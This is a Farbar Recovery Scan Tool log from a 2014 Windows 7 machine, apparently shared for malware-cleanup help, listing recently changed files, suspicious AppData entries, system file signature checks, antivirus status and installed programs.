2014-08-15 23:55 - 2014-07-24 13:50 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-08-15 23:55 - 2014-07-24 13:49 - 01802240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-08-15 23:55 - 2014-07-24 13:49 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-08-15 23:55 - 2014-07-24 13:49 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-08-15 23:55 - 2014-07-24 13:49 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-08-15 23:55 - 2014-07-24 13:49 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-08-15 23:55 - 2014-07-24 13:48 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-08-15 23:55 - 2014-07-24 13:48 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-08-15 23:55 - 2014-07-24 13:48 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-08-15 23:55 - 2014-07-24 13:48 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-08-15 23:55 - 2014-07-24 13:48 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-08-15 23:55 - 2014-07-24 13:48 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-08-15 23:55 - 2014-07-24 13:48 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-08-15 23:55 - 2014-07-24 13:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-08-15 23:55 - 2014-07-15 23:23 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-15 23:55 - 2014-07-15 22:46 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-08-15 23:55 - 2014-07-13 22:02 - 01216000 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2014-08-15 23:55 - 2014-07-13 21:40 - 00664064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2014-08-15 23:55 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-08-15 23:55 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-08-15 23:55 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-08-15 23:55 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-08-15 23:55 - 2014-07-08 22:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-08-15 23:55 - 2014-07-08 21:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL
2014-08-15 23:55 - 2014-07-08 21:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL
2014-08-15 23:55 - 2014-07-08 21:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL
2014-08-15 23:55 - 2014-07-08 21:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL
2014-08-15 23:55 - 2014-07-08 21:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL
2014-08-15 23:55 - 2014-07-08 18:38 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-08-15 23:55 - 2014-07-08 18:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls
2014-08-15 23:55 - 2014-06-24 22:05 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-08-15 23:55 - 2014-06-24 21:41 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-08-15 23:55 - 2014-06-15 22:10 - 00985536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2014-08-15 23:55 - 2014-06-03 06:02 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-08-15 23:55 - 2014-06-03 06:02 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-08-15 23:55 - 2014-06-03 06:02 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-08-15 23:55 - 2014-06-03 06:02 - 00112064 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-08-15 23:55 - 2014-06-03 05:29 - 02363392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-08-15 23:55 - 2014-06-03 05:29 - 01805824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2014-08-15 23:55 - 2014-06-03 05:29 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2014-08-11 10:11 - 2014-08-11 10:11 - 00000342 _____ () C:\Windows\PFRO.log
2014-08-08 13:47 - 2014-08-08 18:22 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\3878295211
2014-08-08 13:47 - 2014-08-08 14:23 - 00000030 _____ () C:\Users\FD-2\AppData\Roaming\3617758948
2014-08-08 13:47 - 2014-08-08 13:47 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\2433510085
2014-08-08 13:46 - 2014-08-11 10:10 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\502041251
2014-08-08 13:46 - 2014-08-08 18:23 - 00000000 ____D () C:\Users\FD-2\AppData\Local\98a319
2014-08-08 13:46 - 2014-08-08 13:47 - 00000000 ____D () C:\Users\FD-2\AppData\Local\browser_dir
2014-08-08 13:46 - 2014-08-08 13:46 - 49308698 _____ () C:\Users\FD-2\AppData\Roaming\3473679561
2014-08-08 13:46 - 2014-08-08 13:46 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\3713821378
2014-08-08 13:46 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\98a319
2014-08-08 13:46 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\1712912303
2014-08-08 13:45 - 2014-08-08 18:26 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\3353960855

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 08:39 - 2014-09-01 00:55 - 00017658 _____ () C:\Users\FD-2\Downloads\FRST.txt
2014-09-01 08:39 - 2014-09-01 00:55 - 00000000 ____D () C:\FRST
2014-09-01 08:38 - 2014-09-01 08:38 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64(2).exe
2014-09-01 08:34 - 2014-01-27 16:03 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-01 06:04 - 2013-08-19 20:21 - 00000000 ____D () C:\Program Files (x86)\Automatic Update
2014-09-01 05:03 - 2009-07-14 00:45 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-01 05:03 - 2009-07-14 00:45 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-01 05:00 - 2014-07-29 06:04 - 01587551 _____ () C:\Windows\WindowsUpdate.log
2014-09-01 02:13 - 2014-09-01 02:13 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64(1).exe
2014-09-01 02:11 - 2014-09-01 02:10 - 05161948 _____ (ParetoLogic, Inc.) C:\Users\FD-2\Downloads\Repair-tool(1).exe.part
2014-09-01 02:09 - 2014-09-01 02:09 - 05162600 _____ (ParetoLogic, Inc.) C:\Users\FD-2\Downloads\Repair-tool.exe
2014-09-01 01:34 - 2009-07-14 01:13 - 00814438 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-01 01:27 - 2014-08-01 17:04 - 00000392 _____ () C:\Windows\setupact.log
2014-09-01 01:27 - 2014-01-27 16:03 - 00000890 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-01 01:27 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-01 01:22 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\SysWOW64\MUI
2014-09-01 01:22 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\system32\MUI
2014-09-01 01:20 - 2014-09-01 01:22 - 03219456 _____ (VMware, Inc.) C:\Windows\SysWOW64\vm3dgl.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 03219456 _____ (VMware, Inc.) C:\Windows\system32\vm3dgl.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00602112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstime.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00602112 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00217088 _____ (VMware, Inc.) C:\Windows\SysWOW64\vm3dum.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00217088 _____ (VMware, Inc.) C:\Windows\system32\vm3dum.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00061440 _____ (VMware, Inc.) C:\Windows\SysWOW64\vsocklib.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00061440 _____ (VMware, Inc.) C:\Windows\system32\vsocklib.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00053248 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmGuestLib.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00053248 _____ (VMware, Inc.) C:\Windows\system32\vmGuestLib.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00049152 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmhgfs.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00049152 _____ (VMware, Inc.) C:\Windows\system32\vmhgfs.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00032768 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmGuestLibJava.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00032768 _____ (VMware, Inc.) C:\Windows\system32\vmGuestLibJava.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00016384 _____ () C:\Windows\SysWOW64\corpol.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00016384 _____ () C:\Windows\system32\corpol.dll
2014-09-01 01:07 - 2014-09-01 01:07 - 00001091 _____ () C:\Users\FD-2\Desktop\DllTool.lnk
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DllTool
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\KSafe
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\ProgramData\KSafe
2014-09-01 01:06 - 2014-09-01 01:06 - 08473440 _____ ( ) C:\Users\FD-2\Downloads\DllTool.exe
2014-09-01 01:06 - 2014-09-01 01:06 - 00000000 ____D () C:\Program Files (x86)\DllTool
2014-09-01 00:57 - 2014-09-01 00:57 - 00037443 _____ () C:\Users\FD-2\Downloads\Addition.txt
2014-09-01 00:55 - 2014-09-01 00:55 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64.exe
2014-09-01 00:20 - 2013-08-19 21:56 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-08-29 13:03 - 2013-08-19 20:21 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\Amadeus
2014-08-28 16:59 - 2014-07-09 10:43 - 00000000 ____D () C:\Users\FD-2\Desktop\Sharon
2014-08-28 03:20 - 2014-08-01 17:03 - 00495456 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-27 01:15 - 2014-08-27 01:15 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-08-25 13:38 - 2014-08-25 13:37 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-08-22 22:07 - 2014-08-27 23:55 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-22 21:45 - 2014-08-27 23:55 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2014-08-22 20:59 - 2014-08-27 23:55 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-16 04:11 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\rescache
2014-08-16 03:17 - 2013-08-19 22:17 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-08-16 03:08 - 2014-01-22 06:52 - 00000000 ____D () C:\Windows\system32\MRT
2014-08-16 03:07 - 2014-01-22 06:52 - 99218768 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-08-16 03:00 - 2014-05-06 03:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-08-14 20:36 - 2014-01-27 16:04 - 00002189 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-08-11 10:11 - 2014-08-11 10:11 - 00000342 _____ () C:\Windows\PFRO.log
2014-08-11 10:10 - 2014-08-08 13:46 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\502041251
2014-08-08 18:26 - 2014-08-08 13:45 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\3353960855
2014-08-08 18:23 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Local\98a319
2014-08-08 18:22 - 2014-08-08 13:47 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\3878295211
2014-08-08 14:23 - 2014-08-08 13:47 - 00000030 _____ () C:\Users\FD-2\AppData\Roaming\3617758948
2014-08-08 13:47 - 2014-08-08 13:47 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\2433510085
2014-08-08 13:47 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Local\browser_dir
2014-08-08 13:46 - 2014-08-08 13:46 - 49308698 _____ () C:\Users\FD-2\AppData\Roaming\3473679561
2014-08-08 13:46 - 2014-08-08 13:46 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\3713821378
2014-08-08 13:46 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\98a319
2014-08-08 13:46 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\1712912303
2014-08-06 22:06 - 2014-08-15 23:55 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-08-06 22:01 - 2014-08-15 23:55 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-08-05 09:20 - 2010-11-20 23:27 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-08-04 17:24 - 2014-08-01 16:59 - 00116072 _____ () C:\Users\FD-2\AppData\Local\GDIPFONTCACHEV1.DAT
2014-08-04 12:01 - 2014-07-31 12:44 - 00000000 ____D () C:\Users\FD-2\Documents\Millenium Reports
2014-08-03 03:00 - 2009-07-13 22:34 - 00000478 _____ () C:\Windows\win.ini

Files to move or delete:
====================
C:\Users\FD-2\g2ax_customer_downloadhelper_win32_x86.exe
C:\Users\FD-2\g2ax_expert_downloadhelper_win32_x86.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-08-17 00:07

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 31-08-2014 02
Ran by FD-2 at 2014-09-01 08:40:31
Running from C:\Users\FD-2\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET NOD32 Antivirus 6.0 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1}
AS: ESET NOD32 Antivirus 6.0 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

24im (Remove Only) (HKLM-x32\...\24im) (Version:  - 24im LLC)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.8.0.1430 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.8.0.1430 - Adobe Systems Incorporated) Hidden
Adobe Download Assistant (x32 Version: 1.2.6 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.8.800.94 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Amadeus FXG (HKLM-x32\...\{32EE59BC-4642-4CC5-810F-4A7720C89EF3}) (Version: 1.2.3 - Amadeus North America)
Amadeus NA Library (HKLM-x32\...\InstallShield_{B39B4400-4621-4AB7-BCDF-760626FB1027}) (Version: 2.0.0 - Amadeus North America)
Amadeus NA Library (x32 Version: 2.0.0 - Amadeus North America) Hidden
Amadeus RailKey Agent  (HKLM-x32\...\{83E92A83-EFB1-4699-A1E5-E3784235FB65}) (Version: 1.0.3 - Amadeus)
CCleaner (HKLM\...\CCleaner) (Version: 4.04 - Piriform)
Citrix Online Launcher (HKLM-x32\...\{C57F6C71-C365-4AFF-9108-397BBAD6127F}) (Version: 1.0.204 - Citrix)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.50.5.51 - Conexant)
CyberLink PowerDVD 9.6 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.6.1.4418 - CyberLink Corp.)
CyberLink PowerDVD 9.6 (x32 Version: 9.6.1.4418 - CyberLink Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DataDirect ODBC driver for InterBase (HKLM-x32\...\DataDirect ODBC driver for InterBase) (Version:  - )
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{132D27B8-C656-44BD-8C16-73C54EA8A85F}) (Version:  - Microsoft)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
DllTool 1.0 (HKLM-x32\...\{8C36FC6F-3576-447C-B15D-FF1504C91104}_is1) (Version:  - )
ESET NOD32 Antivirus (HKLM\...\{C2C49561-CD30-4A44-92AB-81BC2ECA2CB0}) (Version: 6.0.316.0 - ESET, spol s r. o.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 6.2.1.618 - Foxit Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 36.0.1985.143 - Google Inc.)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
GoToAssist Customer 2.1.0.715 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.1.0.715 - Citrix Online)
ICVERIFY for Windows 4.2.0 (HKLM-x32\...\{C177DBBF-E6E7-4EF5-813A-CCD24267ACAA}) (Version: 4.2.0.0 - FDMS)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2712 - Intel Corporation)
Interbase XE (HKLM-x32\...\Interbase XE) (Version:  - )
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lotus NotesSQL 3.01 driver (HKLM-x32\...\{113EECD6-9A04-11D4-811D-00805F923B86}) (Version:  - )
Lotus SmartSuite - English (HKLM-x32\...\{536D6172-7453-7569-7465-392E38300409}) (Version: 9.8.0 - Lotus Development Corporation)
Macromedia Flash Player (HKLM-x32\...\{0456ebd7-5f67-4ab6-852e-63781e3f389c}) (Version: 7.0.19.0 - Macromedia, Inc.)
Microsoft .NET Compact Framework 2.0 (HKLM-x32\...\{625386A4-B6B6-4911-A6E8-23189C3F2D15}) (Version: 2.0.5239 - Microsoft Corporation)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office 2003 Primary Interop Assemblies (HKLM-x32\...\{91490409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.6553.0 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Outlook 2010 (HKLM-x32\...\Office14.OUTLOOK) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (x32 Version: 8.0.60940.0 - Microsoft Corporation) Hidden
Mozilla Firefox 31.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 31.0 - Mozilla)
Mozilla Thunderbird 31.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Panini 4.0 Universal Installer (HKLM-x32\...\{68FF4E69-53DC-485C-ADD9-E56FF9A406F8}) (Version: 4.00.300 - Panini)
PDFill PDF Editor with FREE Writer and FREE Tools (HKLM\...\{D1399216-81B2-457C-A0F7-73B9A2EF6902}) (Version: 11.0 - PlotSoft LLC)
PhotoShowExpress (x32 Version: 2.0.063 - Sonic Solutions) Hidden
QuickBooks (x32 Version: 24.0.4007.2403 - Intuit Inc.) Hidden
QuickBooks Pro 2014 (HKLM-x32\...\{4A21D17E-2FE8-42CD-88B7-ACF8E8860834}) (Version: 24.0.4007.2403 - Intuit Inc.)
QuickBooks Runtime Redistributable (HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit Inc.)
RBVirtualFolder64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Roxio Activation Module (x32 Version: 1.0 - Roxio) Hidden
Roxio BackOnTrack (x32 Version: 1.3.3 - Roxio) Hidden
Roxio Burn (x32 Version: 1.8 - Roxio) Hidden
Roxio Creator Starter (HKLM-x32\...\{6F0BBEFE-BE1C-419B-BA1F-D36C9E7915BC}) (Version: 12.1.77.0 - Roxio)
Roxio Creator Starter (x32 Version: 1.0.439 - Roxio) Hidden
Roxio Creator Starter (x32 Version: 5.0.0 - Roxio) Hidden
Roxio Express Labeler 3 (x32 Version: 3.2.2 - Roxio) Hidden
Roxio File Backup (Version: 1.3.2 - Roxio) Hidden
Scanner Controller Web Client (HKLM-x32\...\{A597C45E-1662-4FC6-B1FF-BAC277888C9C}) (Version: 1.7.252 - ProfitStars)
ScanSnap (x32 Version: 4.2.31.1 - PFU Limited) Hidden
ScanSnap Manager (HKLM-x32\...\{DBCDB997-EEEB-4BE9-BAFF-26B4094DBDE6}) (Version: V4.2L32 - PFU)
ScanSnap Organizer (HKLM-x32\...\{E58F3B88-3B3E-4F85-9323-04789D979C15}) (Version: V3.2L13 - PFU)
ScanSnap Organizer (x32 Version: 3.2.13.1 - PFU LIMITED) Hidden
